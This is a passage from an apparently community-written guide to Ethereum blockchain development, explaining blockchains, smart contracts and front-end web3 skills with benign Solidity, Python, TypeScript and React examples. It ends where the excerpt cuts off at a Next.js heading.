- [Smart contract development](#smart-contract-development)
- [Backend blockchain development](#backend-development)
- [Core protocol development](#core-protocol-development)
- [Full-stack blockchain development](#full-stack-blockchain-development)
- [Cryptography](#cryptography)
**Coming soon**
- [Security engineer](#security-engineer)
- [MEV searcher](#mev-searcher)
- [Cryptography](#cryptography)
- [Blockchain data analytics](#blockchain-data-analytics)
#### Application-based
Another way to separate types of blockchain development is not based on the underlying tech stack, but on the use case that you are targeting. These are the categories that I believe are the most popular, however, there are many others that I'm not covering to keep the scope of this article more manageable.
**Coming soon**
- [DeFi](#defi)
- [Creator Economy](#creator-economy)
- [MEV](#mev)
- [L2s](#l2s)
- [Infrastructure](#infrastructure)
- [Gaming](#gaming-development)
- [Privacy](#privacy)
- [Coordination / Public goods](#coordination--public-goods)
#### Non-technical sections
- [Getting a job](#getting-a-job)
- [Social Capital](#social-capital)
- [Mastery](#mastery)
- [Community](#community)
## How to get started?
No matter if you are a beginner programmer or if you've been coding for years, this guide will provide resources for all levels of expertise. If there is something that you already know in the specialization roadmaps that I have here, feel free to skip the material or use it as an opportunity to review what you already know and potentially fill in some gaps in your understanding.
Blockchain development might seem very intimidating at first, there are many moving parts, foundational knowledge from various different fields is required, the technologies are constantly evolving and aren't as mature as in other areas of development such as in the web development space, there is a financial aspect to almost every application as you are programming on top of a value layer, etc. However, it is not as hard as you might think. Once you get familiarized with the basics, understanding everything else that is going on is usually just a matter of applying a general understanding to a specific situation. If you build a strong foundation then it will be much easier to process more complex topics and reason about problems relating to a new subject matter.
If you have a background in computer science, mathematics, or any related field, then you will have a much easier time getting started with blockchain development as many foundational concepts are abstractions of algorithms and data structures. If you are a complete beginner then please make sure you take the initial few steps with patience so as to not feel overwhelmed. Once you start familiarizing yourself with the material you will start to feel like it is more manageable.
### General foundation
To get started with blockchain development, one must first understand how blockchains work, in order to build a mental model of how each moving piece functions and to understand the design principles that will govern your development experience.
#### Blockchains
The term blockchain has two different meanings, it can either relate to a data structure or to a computer network.
A blockchain (data structure) consists of sets of transactions or data bundled inside a container where each container has a cryptographic [hash](https://www.youtube.com/watch?v=QJ010l-pBpE) of the data in the previous container (block) within it. If the contents of the previous block change, the hash changes as well and thanks to this feature we can assure that the data hasn't been tampered with. The second consequence of the blockchain data structure is that it is append-only. You can't prepend data to it, nor modify the data already within it, as that would alter the hashes of all the blocks succeeding the ones that have been modified. This is why we call blockchains immutable.
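To make the hash-linking concrete, here is a tiny illustrative sketch in plain Python (not a real blockchain client): each block stores the hash of the previous block, so changing any earlier block invalidates every hash that follows.
```python
import hashlib
import json

def block_hash(block):
    # Hash the block's contents deterministically with SHA-256
    return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

def make_block(data, prev_hash):
    return {"data": data, "prev_hash": prev_hash}

genesis = make_block("genesis", "0" * 64)
block1 = make_block("Alice pays Bob 1 ETH", block_hash(genesis))
block2 = make_block("Bob pays Carol 2 ETH", block_hash(block1))

# Tampering with an earlier block breaks the hash link stored in every later block
genesis["data"] = "genesis (tampered)"
print(block_hash(genesis) == block1["prev_hash"])  # False: the change is detectable
print(block_hash(block1) == block2["prev_hash"])   # True: untouched links still verify
```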
A blockchain (network) is a network of computers that maintain a synchronized ledger of transactions, which uses the blockchain (data structure) for storing data (usually inside merkle/verkle trees). The blockchain is powered by miners/validators that operate under a so-called consensus algorithm; this algorithm helps coordinate who produces and organizes blocks, as well as indicating which is the longest chain, by continuously updating the head of the blockchain. Blockchains have 3 main properties which they try to optimize for: Security, Decentralization, and Scalability. They achieve security and decentralization through their consensus algorithm, where many different parties need to either provide resources, mostly in the form of running expensive operations on massive hardware facilities with [Proof-of-Work](https://en.wikipedia.org/wiki/Proof_of_work) (PoW), or stake economic resources in the network with [Proof-of-Stake](https://ethereum.org/en/developers/docs/consensus-mechanisms/pos/) (PoS). The more participants and the more distributed the power dynamics among those participants, the more security and decentralization. There are many other features that contribute to decentralization, like client software that can run on consumer hardware so that anyone can synchronize the state of the blockchain in their own node, limiting how many transactions can be processed per block so that the state doesn't grow too large, and much more.
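As a toy illustration of the Proof-of-Work idea mentioned above, the sketch below brute-forces a nonce until a block's hash starts with a few zero hex digits; real networks use far higher difficulty targets and a very different block layout.
```python
import hashlib

def mine(block_data, difficulty=4):
    # Find a nonce whose SHA-256 hash starts with `difficulty` zero hex characters (toy difficulty)
    prefix = "0" * difficulty
    nonce = 0
    while True:
        digest = hashlib.sha256(f"{block_data}:{nonce}".encode()).hexdigest()
        if digest.startswith(prefix):
            return nonce, digest
        nonce += 1

nonce, digest = mine("block containing some transactions")
print(nonce, digest)  # verifying the answer takes one hash; finding it takes many
```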
- **Further reading**
To understand how blockchains work beyond my simple explanation here, read and watch the following resources:
- [Blockchain Explained - Investopedia](https://www.investopedia.com/terms/b/blockchain.asp)
- [Blockchain 101 - Anders Brownworth](https://www.youtube.com/watch?v=_160oMzblY8)
- [But how does Bitcoin actually work? - 3Blue1Brown](https://www.youtube.com/watch?v=bBC-nXj3Ng4)
- Optional (cultural significance): [Bitcoin whitepaper](https://bitcoin.org/bitcoin.pdf)
#### Ethereum
Since this is a guide about blockchain development on Ethereum, you need to know how the Ethereum blockchain works and the changes it will undergo in the future, so as to be prepared for what's to come as a developer. If you have done web development before, you can think of these changes like a new ECMAScript standard, a new browser compile target (i.e. WASM), a new engine (V8), etc. The Ethereum blockchain is constantly evolving, and quite a few changes will be put in place before the core technologies of the network start to ossify.
A good way to get started with how Ethereum works is to watch [Austin Griffith](https://twitter.com/austingriffith)'s [ETH.BUILD YouTube playlist](https://www.youtube.com/playlist?list=PLJz1HruEnenCXH7KW7wBCEBnBLOVkiqIi) where he illustrates how various parts of the Ethereum blockchain work.
"In the Ethereum universe, there is a single, canonical Turing-complete(computational universal) computer (called the Ethereum Virtual Machine, or EVM) whose state everyone on the Ethereum network agrees on. Everyone who participates in the Ethereum network (every Ethereum node) keeps a copy of the state of this computer. Additionally, any participant can broadcast a request for this computer to perform arbitrary computation. Whenever such a request is broadcast, other participants on the network verify, validate, and carry out ("execute") the computation. This execution causes a state change in the EVM, which is committed and propagated throughout the entire network." (source: [ethereum.org documentation](https://ethereum.org/en/developers/docs))
In order to learn the basics of Ethereum, go through the [ethereum.org documentation](https://ethereum.org/en/developers/docs). Here are links for each section:
- [Intro to Ethereum](https://ethereum.org/en/developers/docs/intro-to-ethereum/)
- [Intro to Ether](https://ethereum.org/en/developers/docs/intro-to-ether/)
- [Intro to dapps](https://ethereum.org/en/developers/docs/dapps/)
- [Web2 vs. Web3](https://ethereum.org/en/developers/docs/web2-vs-web3/)
- [Accounts](https://ethereum.org/en/developers/docs/accounts/)
- [Transactions](https://ethereum.org/en/developers/docs/transactions/)
- [Blocks](https://ethereum.org/en/developers/docs/blocks/)
- [Ethereum Virtual Machine (EVM)](https://ethereum.org/en/developers/docs/evm/) (skip the Opcodes section, we'll revisit that later)
- [Gas](https://ethereum.org/en/developers/docs/gas/)
- [Nodes and clients](https://ethereum.org/en/developers/docs/nodes-and-clients/)
- [Networks](https://ethereum.org/en/developers/docs/networks/)
- [Consensus mechanisms](https://ethereum.org/en/developers/docs/consensus-mechanisms/)
- [Governance / EIP process](https://ethereum.org/en/governance/)
- **Ethereum roadmap - Endgame**
[This graphic](https://github.com/dcbuild3r/blockchain-development-guide/blob/main/images/ethereum_roadmap.png) shows all the different changes which are being implemented to Ethereum in the upcoming years. It's not necessary to understand everything in it, but it is good to be aware of. I suggest watching the video resource appended after the graphic to learn more about what these flowcharts mean.
- **Further reading**
- [Ethereum Whitepaper](https://ethereum.org/en/whitepaper/)
- [Why Proof of Stake - Vitalik Buterin](https://vitalik.ca/general/2020/11/06/pos2020.html)
#### Smart contracts
A smart contract is a program that runs on the Ethereum blockchain. It's a piece of code that has functions and data (state) which resides at a specific address on the Ethereum blockchain.
Smart contracts are a type of [Ethereum account](https://ethereum.org/en/developers/docs/accounts/), meaning that they have a balance and can send transactions over the network. They are deployed on the network and run as programmed; user accounts (externally-owned accounts, or EOAs) can interact with a smart contract by submitting transactions that call its publicly accessible functions. Smart contracts can be used to define rules which are enforced via code, e.g. a smart contract that allows two parties to swap their tokens (like Uniswap).
**How do I create a smart contract?**
The most popular smart contract programming language which targets the Ethereum Virtual Machine is [Solidity](https://docs.soliditylang.org/). It is a high-level language that was influenced by C++, Python, and JavaScript, so its syntax looks familiar. Solidity is statically typed and supports inheritance, libraries, user-defined types, and more. It is a compiled language, which means that before you have a runnable smart contract, a Solidity program needs to be run through a compiler that generates a low-level representation called bytecode: the set of instructions that the EVM can understand and execute.
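As an illustration of that compile step, here is a hedged sketch using the `solc` npm package (solc-js) with its standard-JSON input format. The file name and the tiny inline contract are placeholders, and the package is an assumption you would install yourself (`npm install solc`):

```ts
// Sketch: compiling a contract to its ABI and EVM bytecode with solc-js.
// The package ships no bundled TypeScript types, hence the plain require.
const solc = require("solc");

const source = `
  // SPDX-License-Identifier: MIT
  pragma solidity ^0.8.10;
  contract Counter { uint private count; function get() public view returns (uint) { return count; } }
`;

const input = {
  language: "Solidity",
  sources: { "Counter.sol": { content: source } },
  settings: { outputSelection: { "*": { "*": ["abi", "evm.bytecode"] } } },
};

const output = JSON.parse(solc.compile(JSON.stringify(input)));
const artifact = output.contracts["Counter.sol"]["Counter"];
console.log(artifact.abi);                 // the contract's ABI, used by front ends
console.log(artifact.evm.bytecode.object); // the bytecode the EVM actually executes
```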
There are other languages that can be used to target the EVM like [Vyper](https://vyper.readthedocs.io/en/stable/toctree.html) and [Fe](https://fe-lang.org/) that have their pros and cons, however, they don't have as robust development ecosystems and aren't as widely used by projects deployed in production.
Here's what a [simple counter program](https://solidity-by-example.org/first-app/) looks like in Solidity:
```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.10;

contract Counter {
    uint private count;

    // Function to get the current count
    function get() public view returns (uint) {
        return count;
    }

    // Function to increment count by 1
    function inc() public {
        count += 1;
    }

    // Function to decrement count by 1
    function dec() public {
        count -= 1;
    }
}
```
In the beginning, you declare the version of Solidity you are using with the `pragma solidity <version>` directive. To indicate the creation of a contract, you write it using the `contract ContractName {}` form. Within the contract's curly brackets, the logic of the program is declared. We first declare a private variable named `count` with an unsigned integer type (meaning it can only hold non-negative integers). Private functions and state variables are only visible to the contract they are defined in, not to derived contracts. Afterward, we declare three functions: one to retrieve the value held inside the `count` variable, one to increase its value by one, and one to decrement it. The `public` keyword specifies that the function can be called by any address on the blockchain (be it a smart contract or a user-owned account). The `view` modifier specifies that the function doesn't alter the state within the contract (it only reads values already available). The `returns` keyword specifies the type of the value returned by the function, an unsigned integer in the case of `get()`. Everything written after a `//` is considered a comment and is ignored by the Solidity compiler. Comments make the code more readable and maintainable, which is especially helpful if you are working in a team or revisit a codebase after some time, and they also act as documentation for what the code is doing.
**How do I compile and deploy my first contract?**
In order to compile and deploy our first smart contract, we will use the Remix IDE, a website where we can write smart contracts, compile them, and deploy them on a local instance of the EVM. We can also interact with the locally deployed smart contract to test out its functionality. To deploy our simple counter contract, go to [Remix](https://remix.ethereum.org/), add a new file in the contracts directory, name it `Counter.sol`, and copy-paste the code from the [counter example](https://solidity-by-example.org/first-app/). Now click on the second icon from the top in the selection bar on the left; it shows the logo of the Solidity programming language and represents the Solidity compiler in Remix. In the compiler dropdown select 0.8.10, which is the Solidity version in our smart contract, and click "Compile Counter.sol". After you have compiled your contract, click on the third icon from the top, which should be named "Deploy & Run Transactions", and click "Deploy". You should then see a list item reading "> COUNTER AT 0x.... (MEMORY)". You've successfully compiled and deployed your first smart contract! Now that you have it deployed, you can interact with it by calling the `inc()` or `dec()` functions to increase or decrease the value of the `count` variable, and the `get()` function to retrieve its value.
![remix](./images/remix.png)
We will go into a lot more depth on how smart contracts are programmed, tested, and deployed in the smart contract development section.
#### Web 2.0
Although blockchain developers build decentralized applications, the technologies used to build these applications overlap to a large extent with those of traditional web development. User interfaces for dapps are hosted on the internet and are built with traditional web technologies. In order to interact with a smart contract, a user submits a request to a server that hosts an application; the application creates a transaction, gets the user's signature via a web3 wallet like MetaMask, and then submits the transaction to an Ethereum RPC. The transaction then goes to the mempool, gets picked up by a miner (PoW) / validator (PoS), gets executed and included in the blockchain, and the user interface updates once the blockchain emits an event signalling a successful call of a function inside a smart contract. This is the usual flow that decentralized applications follow.
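Below is a hedged TypeScript sketch of that flow using ethers.js v5 and an injected browser wallet such as MetaMask. `COUNTER_ADDRESS` is a hypothetical deployment of the Counter contract from earlier, not a real address:

```ts
// Sketch of the usual dapp flow: connect wallet, sign a transaction, wait for inclusion.
import { ethers } from "ethers";

const COUNTER_ADDRESS = "0x0000000000000000000000000000000000000000"; // placeholder address
const COUNTER_ABI = [
  "function get() view returns (uint256)",
  "function inc()",
];

async function incrementCounter() {
  // MetaMask injects an EIP-1193 provider at window.ethereum
  const injected = (window as any).ethereum;
  const provider = new ethers.providers.Web3Provider(injected);
  await provider.send("eth_requestAccounts", []); // ask the user to connect their wallet

  const signer = provider.getSigner();
  const counter = new ethers.Contract(COUNTER_ADDRESS, COUNTER_ABI, signer);

  const tx = await counter.inc(); // wallet pops up, user signs, tx goes to the mempool
  await tx.wait();                // resolves once the tx is included in a block

  const value: ethers.BigNumber = await counter.get();
  console.log(`count is now ${value.toString()}`);
}
```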
Any blockchain developer who wants to build full-stack applications needs to know how the internet and its most important protocols work, as well as how to build user interfaces for all the major platforms (web, mobile, etc). You can think of web3 as adding a native value layer to the internet; it also helps with social coordination and resource allocation through the decentralized autonomous organization (DAO) structure. It is very helpful to know how the web and the existing technologies built on top of it work, and to understand how crypto and web3 work, in order to create better applications.
I believe that even if you don't end up developing front-ends, it is still good to know how they work on a foundational level, as in almost all kinds of development you'll interface with the web in some form. A good learning roadmap for the basics of how web technologies work is the initial part of the [roadmap.sh frontend](https://roadmap.sh/frontend) roadmap. It is also a must to learn how to version control your code; Git is the most popular version control and collaboration software, along with GitHub / GitLab for hosting repositories and collaborating with other coders.
![Frontend roadmap](./images/FE_roadmap.png)
- **Learning resources**
- [How does the internet work](https://www.youtube.com/watch?v=zN8YNNHcaZc)
- [CS50 HTTP lecture](https://www.youtube.com/watch?v=PUPDGbnpSjw) (the [CS50 course](https://www.edx.org/course/introduction-computer-science-harvardx-cs50x) on edX is a great intro into computer science)
- [freeCodeCamp](https://www.freecodecamp.org/) - Here you can learn the basics of how HTML, CSS and JS works. Unless you're planning to write frontend interfaces you won't need it, but it's still good to experiment and learn how it works.
#### What makes decentralization important?
In the web 2.0 world, we're used to having a main account on platforms like Google and Facebook which we use to log into other services. All of our data is hosted inside centralized databases, and our private information is used in advertising software to sell us products. In exchange for our data, we get free services. These big centralized entities have a lot of power and control over our daily lives through the products we use every day. This is the business model that has worked for the past few decades.
When you decentralize these services and become a sovereign user, you can't be de-platformed, censored, or exploited. As long as you have access to a computer and to the internet, you can use any application running on a permissionless and decentralized blockchain. Nobody can fundamentally block access to them, because you can always run a node yourself, call a smart contract, and submit a transaction to the network. Decentralized applications are still in their infancy and many technologies are not yet mature enough to support mainstream adoption; however, there is huge demand for these applications and the industry is evolving rapidly.
In a web3 world, users own their assets, their money, their identity, and their data. This allows for a fundamentally better user experience, and eventually a practically better one once these technologies become mature enough to support the masses. You could eventually have applications like decentralized social networks where users own their content, artists and musicians who mint their artwork as NFTs and earn revenue from royalties while engaging more closely with their audiences, virtual worlds where people own their digital identity, their virtual items, and their land, and so on. The possibilities in web3 are growing day by day, and I think it is one of the most exciting technologies that humankind has ever devised. It unlocks so much potential.
### Web3 values
The web3 movement is about creating a value layer for the internet where we can set up incentive structures for the betterment of society, in order to make a fairer world where access to products and services is openly distributed, permissionless, and accessible to everyone on the planet no matter their provenance.
There are many good initiatives like [Kernel](https://kernel.community/en/), [Gitcoin](https://gitcoin.co/), [GreenPill](https://greenpill.party/) and many others that try to help educate about and fund the new wave of public goods and infrastructure in order to create a better world. As a blockchain developer, it is good to get a feeling for why these systems are built in the first place and for the values the products and services we create should embody, so as to not recreate the centralized web2 world we currently have.
In order to learn more about web3 values and how we can create a fairer world, go over [Kernel's web3 lessons](https://kernel.community/en/learn/).
### Play around
Blockchain development might feel overwhelming, and frankly very intimidating, when you are starting out. To remedy this feeling, I suggest you treat programming on blockchains like an adventure game. Explore what is possible, experiment by creating small projects with technologies that you find interesting, look at what other people are building and interact with their applications, debate with various people about their favorite applications and technologies, and get a feel for how everything works.
As you progress through this guide, you'll start going deeper into various fields. There is a myriad of interesting primitives in web3 and types of applications you could build, so picking what to specialize in is very hard unless you have a clear goal in mind from the get-go, which is quite rare. I personally think that trying everything that interests you, even if only for a short while, gives you a glimpse into each field and insight into whether you'd like to focus on that particular area. For this I suggest getting into different developer and research groups and talking about what it's like to build those things, what types of problems you would be working on, how one gets better in that field, what there is to work on, etc. One of my favorite such groups is [Newt](https://twitter.com/wearenewt), which is Aave's experimentation branch. Newt is completely community-driven and tries to promote open-source experimentation where the community is welcome to contribute to existing experiments or create their own. Here you can meet like-minded developers, build cool projects, and explore different areas of development and different fields within web3 such as DeFi, NFTs, and more. [DeveloperDAO](https://twitter.com/developer_dao) and [EthernautDAO](https://twitter.com/EthernautDAO) are also good developer communities where you can find like-minded individuals, explore what's possible in web3, and potentially even get full-time job offers.
### Connect
Blockchain development is a fairly new field, so most information about how to build applications in web3 is available on the internet rather than in universities and other educational institutions. This might make it a lonely endeavor, but it need not be! There are people all across the world learning how to build cool projects with these technologies, and everyone is looking to learn from each other and make friends in the space. As mentioned before, join DAOs and groups like Newt, DeveloperDAO, EthernautDAO, etc, talk about your learning journey on Twitter, and try to share insights from your experience with learning these technologies. You're bound to find like-minded individuals to share your interests with, and it helps a lot with learning the material: when you have to explain a complex topic to a person without prior knowledge, it forces you to understand your subject very well in order to explain it simply. Pair-programming or pair-learning is also a good way to cement new learnings. Personally, I found that making friends online who are also into blockchain development is what made it the most fun and engaging for me, and it is helping me stick with the material for longer periods of time than I otherwise would have.
Twitter is currently the platform where most builders, researchers, and creators share their insights in the realm of blockchain and web3, so it is almost a must if you want to keep up with the newest technologies. I also recommend not overdoing social media, as it can lead to a drastic decrease in productivity. It's a balance that needs to be achieved over time; a good tip is that whenever you want to check Twitter or Discord you have a clear goal in mind, e.g. "I want to find out what new gas optimizations my friends have come up with." I also recommend creating lists with different types of people so you can sort by the type of content you want to see (DeFi, NFTs, MEV, smart contracts, frontend, design, etc). Bookmarking is also a good feature if you want to revisit interesting tweets in the future.
Another great way to meet devs is to go to hackathons and conferences. If you can afford to go to events then definitely do; however, if you don't have enough funds there are often grants for first-time attendees through places like [PadawanDAO](https://twitter.com/PadawanDAO) and others. Asking around to volunteer will usually get you free entrance, and people are often kind enough to pool funds to sponsor people looking to get into the space who don't have the means to travel by themselves. In-person events like hackathons are a great way to develop your skills and meet people. They are where many projects that are popular today were started and where founders of projects often meet for the first time. As for events worth going to in 2022, I suggest [Devconnect](https://twitter.com/EFDevconnect) (Amsterdam), [ETHPrague](https://twitter.com/EthPrague), [ETHCC](https://twitter.com/EthCC)/[ETHParis](https://twitter.com/ETHParis) and [Devcon](https://twitter.com/EFDevcon) (Bogota). Here is a [good list](https://docs.google.com/spreadsheets/d/1NEu_FCc1hnGAuRgPmbXXpf0h2lCrCOlMKbbFEqgkVDQ/edit#gid=0) of Ethereum-related events in 2022. There are events on pretty much every continent, as well as small local events that different communities organize, so look for events near you that might be related to blockchain development in some way, or start one yourself!
I also recently started creating a [Twitter list with blockchain devs](https://twitter.com/i/lists/1483458041412526084) that I think you should follow if you want to learn blockchain development. It is a running list so feel free to DM me devs I should add and I'll consider adding them to the list.
### Build
The next and final step to get started with blockchain development should be obvious by now: actually start building! After you've gone through the introductory foundational material in the sections above, you are ready to get going with one of the specializations listed below. If you are not sure which one you're into yet, just go with full-stack blockchain development and you'll get to try a bit of everything! Start writing code, no matter how bad it is, and try to get feedback on it from devs who know more than you do. Go through the roadmap specified below: learn a concept, take notes, build something around it, do some testing, and move on. If there is something that catches your attention, try building something with it and see where it takes you. Your own curiosity and interest are your best friends when learning blockchain development. You should constantly ask yourself why the thing you wrote worked and how you could make it better; if you can't come up with an answer, ask someone for an explanation or a code review. It is also good to review quality code written by other teams. If you are learning Solidity, for example, the best way to learn advanced Solidity is to read production codebases like Aave v3, Uniswap v3, Balancer v2, etc. The same principle applies to other categories and specializations as well.
Once you build something, share it with the world (unless it's a very profitable MEV bot)! Sharing it on Twitter and in different Discords will bring attention to what you're doing, and you might get constructive feedback and/or meet new friends who are interested in what you are building. If you are building something more complex, write documentation for it or add useful comments if you expect other people to read your code. It is also great to make your code publicly available on hosting platforms like GitHub to build a portfolio of projects which you can showcase when applying for jobs. I'll revisit how to get employment in web3 in a later section.
## Skill-based development
Now we get down to the different specializations. Before looking at the different paths you can take, make sure you've gone through the [Foundational section](#general-foundation). I also suggest reading the introduction to each specialization in both the [skill-based development](#skill-based-development) and [application-based development](#application-based-development) categories so that you have a better idea of what's out there and what you might find interesting before going deeper into any specific one. This section categorizes specializations in blockchain development by the skillsets required within them.
### Front-end development
Front-end (FE) development is highly reminiscent of traditional web (“Web2”) development. This includes the technology stack involved in building out user interfaces connected to blockchain technology.
Just like in traditional environments, FE blockchain developers are expected to fetch data and interact with APIs in order to produce a seamless user experience on a decentralized application.
As a result of the overlap in these core competencies, front-end developers are able to leverage a mature ecosystem of tried and true languages, libraries, and various other tools that will be covered in this section.
Additionally, these similarities contribute to a much more frictionless onboarding process for developers who are new to frontend development. These developers are able to tap into a mature ecosystem composed of developers who eagerly impart their knowledge via platforms such as [StackOverflow](https://stackoverflow.com/), as well as an abundance of well-produced tutorials and documentation for grasping these well-established technologies. Note, however, that such maturity is not the norm in a rapidly emerging ecosystem like web3, which is part of what makes frontend development the most popular choice amongst those new to blockchain technology.
The key principles of front-end development are knowing how to structure and style websites, how to make them dynamic with JavaScript and different frameworks, how to manage state within applications, basic design, how to fetch data from APIs and databases, and how to create good web3 user experiences around wallets and interactions with the smart contract backend of your application. One of the biggest differences in web3 FE development is user authentication: instead of logging in with your email and password or your Google account, you log in with your wallet using a third-party application like [Metamask](https://metamask.io/) or [WalletConnect](https://walletconnect.com/), and use protocols like [ENS](https://ens.domains/) to display information about the user (provided they have an Ethereum domain). If a smart contract contains state which represents a user's past interactions with the application, you also need to fetch historical data from the blockchain on demand, or maintain a local database with indexed data that is easily queryable by the FE of the application.
As a front-end blockchain developer you need to know what a Contract Application Binary Interface ([ABI](https://docs.soliditylang.org/en/v0.8.11/abi-spec.html)) is in order to be able to interact with smart contracts on the Ethereum blockchain or on an L2 like Optimism, Arbitrum, Starknet, or ZkSync which are Ethereum-based scaling solutions that we'll cover in the [L2 section](#l2). You also need to query data from various APIs to accurately display the price of various assets (if applicable), the user's balance of ERC20 tokens or NFTs, and various other data you might need from either the blockchain itself or an external database.
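As a small illustration, a front end only needs a contract's address plus the relevant ABI fragments to read data from it. The sketch below uses ethers.js v5 with a human-readable ABI; the RPC endpoint is an assumption you would replace with your own node or provider:

```ts
// Sketch: reading ERC20 data through a provider using only the ABI fragments the UI needs.
import { ethers } from "ethers";

const provider = new ethers.providers.JsonRpcProvider("https://rpc.example.com"); // hypothetical endpoint

// Human-readable ABI: just the functions this UI actually calls
const erc20Abi = [
  "function balanceOf(address owner) view returns (uint256)",
  "function decimals() view returns (uint8)",
  "function symbol() view returns (string)",
];

async function showBalance(token: string, user: string) {
  const contract = new ethers.Contract(token, erc20Abi, provider);
  const [raw, decimals, symbol] = await Promise.all([
    contract.balanceOf(user),
    contract.decimals(),
    contract.symbol(),
  ]);
  console.log(`${ethers.utils.formatUnits(raw, decimals)} ${symbol}`);
}
```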
Another interesting aspect of programming decentralized applications is the need to build applications that are not hosted on a centralized server. To remedy this problem, many developers open-source their web interfaces and host instances of those interfaces on decentralized storage solutions like IPFS, Arweave, and others. In this way, if one of the servers hosting the interface goes down, users can interact with the smart contracts from many other places. It's also remarkable that, since the functions can be called by anyone, users can interact with decentralized applications from completely different frontends as long as they have the ABI; this allows for massive composability, which we'll cover a bit later.
This roadmap will focus on the frontend technologies that I've seen are mostly used in blockchain development today. I've used the roadmap.sh frontend roadmap, a friend's tech stack, and my experience as a reference for creating this specialization. If you are a more experienced reader feel free to suggest pull requests to add/edit/remove content or you can suggest changes by DMing me on Twitter or Telegram (@dcbuild3r).
#### HTML, CSS, JS, Web APIs
The pillars of web development technologies are HyperText Markup Language (HTML), Cascading Style Sheets (CSS), JavaScript (JS), and web application programming interfaces (APIs).
[HTML](https://en.wikipedia.org/wiki/HTML) is the language that is used to structure websites, with HTML you can insert text, images, videos, create different sections for your website, create links to other sites, and more. [CSS](https://en.wikipedia.org/wiki/CSS) is a styling language that helps you edit how your HTML elements look, how they are displayed and how they are arranged on your screen. It is also what makes user interfaces responsive for different devices like mobile, tablet, laptop, desktop, and others by providing APIs which dynamically resize your HTML elements based on the width and height of the screen a specific user has. [JavaScript](https://en.wikipedia.org/wiki/JavaScript) is a programming language that makes your HTML elements dynamic, it allows for things like complex animations, dynamic formatting of elements depending on given inputs, state management within your application, much more utility thanks to its programmability, and more. HTML, CSS, and JavaScript are the only 3 technologies that browsers understand, the rest of the technologies mentioned in this specialization end up compiling to an optimized HTML, CSS, and JS bundle which the browser can process and interpret.
The best place to learn the basics of web development, in my opinion, is [freeCodeCamp](https://www.freecodecamp.org/), where you can do the lessons in the first two sections named "Responsive Web Design" and "JavaScript Algorithms and Data Structures". Each section is estimated at about 300 hours, but you can usually finish in much less time since that's a conservative estimate. After you've gone through these two sections and built the projects required to complete them, you can move on to learning React.
#### React
In modern web development, you'll almost never write vanilla HTML, CSS, and JavaScript to build your websites. Web developers learn a view framework that helps them structure their code with components and also optimizes how components are rendered and how changes to the application's state affect what users see. The most popular web development framework, by a wide margin over alternatives like Vue.js, is React. React was originally developed by the Facebook team, but it was open-sourced early on and now has thousands of contributors and many full-time maintainers who are constantly pushing the framework forward.
Most of the user interfaces for blockchain applications are programmed using React, and there are many React component libraries that you can reuse from the community to perform common tasks like logging in with an Ethereum wallet or switching networks, as well as so-called React hooks libraries (i.e. [eth-hooks](https://github.com/scaffold-eth/eth-hooks)) which let you fetch data like balances, block numbers, prices, and more.
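As a rough idea of what such a component looks like, here is a hedged sketch in plain React + ethers.js v5 (hook libraries like eth-hooks wrap this kind of logic for you); it assumes an injected wallet at `window.ethereum`:

```tsx
// Sketch: a React component that displays an address's ETH balance.
import { useEffect, useState } from "react";
import { ethers } from "ethers";

export function Balance({ address }: { address: string }) {
  const [balance, setBalance] = useState<string>("...");

  useEffect(() => {
    let cancelled = false;
    const provider = new ethers.providers.Web3Provider((window as any).ethereum);
    provider.getBalance(address).then((wei) => {
      if (!cancelled) setBalance(ethers.utils.formatEther(wei));
    });
    return () => {
      cancelled = true; // avoid setting state after the component unmounts
    };
  }, [address]);

  return <p>{address}: {balance} ETH</p>;
}
```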
I believe that React is best learned from the official documentation, but there are also other resources for people that learn better with video content. Here is a list of React learning resources that I recommend:
- [React in 100 Seconds - Fireship](https://www.youtube.com/watch?v=Tn6-PIqc4UM)
- [React roadmap](https://roadmap.sh/react)
- [Official React documentation](https://reactjs.org/docs/getting-started.html)
- [awesome-react](https://github.com/enaqx/awesome-react) - This GitHub repository aggregates many useful resources for React developers, it has tutorials, tooling, component libraries, frameworks, design patterns, guidelines, and much more. It is a good place to look for inspiration and resources when using React.
- If you want a paid video course I can recommend either [ZTM's React course](https://www.udemy.com/course/complete-react-developer-zero-to-mastery/) or [Maximilian Schwarzmuller's React course](https://www.udemy.com/share/101Wby3@JDt64oz7fMQjMAWBtrmk5wuDfzeEWDYkQeRN1yCa5yjMEWG0cKPDILlqSqtSXEI7/). On Udemy there are sales periods every once in a while which allow you to buy courses for `$15` instead of `$200`, so wait for one of those, never buy for the full price.
- [freeCodeCamp React course on YT](https://youtu.be/bMknfKXIFA8)
- [Learn React for free](https://scrimba.com/learn/learnreact)
Once you feel like you've understood how React works and have learned about lifecycle methods, hooks, how to pass data down through props, how to use the Context API, etc., I recommend trying to build the front end of a web3 app like Uniswap or an NFT marketplace like OpenSea. To rapidly prototype the design I recommend using [tailwind.css](https://tailwindcss.com) and the Chrome developer tools to inspect the styles of the site you're trying to recreate. Also, don't forget to use CSS flexbox/grid where necessary. Try to simulate the data inside these apps using hardcoded JSON objects.
#### Typescript
[Typescript](https://www.typescriptlang.org) is a superset of JavaScript which allows you to statically type JavaScript code, meaning that you declare the types of variables (integer, string, ...). It allows for a better developer experience, as the TypeScript compiler can catch many errors by checking the types of objects before the code ever runs. It also gives developers extra features on top of JavaScript which allow for more expressive code. Remember that TypeScript cannot be run by the browser and needs a compiler to convert TypeScript code into runnable JavaScript. TypeScript is widely used by the web development community thanks to features that improve security and readability, a better development experience inside the IDE with autocompletion, and cool new syntactic sugar on top of JavaScript.
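A tiny example of what static typing buys you (the `TokenBalance` shape is just an illustration, not a standard type):

```ts
// Static types catch mistakes at compile time, before the code ever runs.
interface TokenBalance {
  symbol: string;
  decimals: number;
  raw: bigint; // balance in the token's smallest unit
}

function format(balance: TokenBalance): string {
  const whole = balance.raw / 10n ** BigInt(balance.decimals);
  return `${whole} ${balance.symbol}`;
}

format({ symbol: "DAI", decimals: 18, raw: 42_000000000000000000n }); // ok
// format({ symbol: "DAI", decimals: "18", raw: 42 });
// ^ compile-time error: `decimals` must be a number and `raw` a bigint
```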
I recommend going to the [Typescript documentation](https://www.typescriptlang.org/docs/handbook/intro.html), it is good to get into the habit of going to official documentation since they are usually the right place to visit if you are learning new technology. Once you have the basics down try building a simple application with it or refactor an existing application in a way that uses the technology that you are learning.
#### Next.js
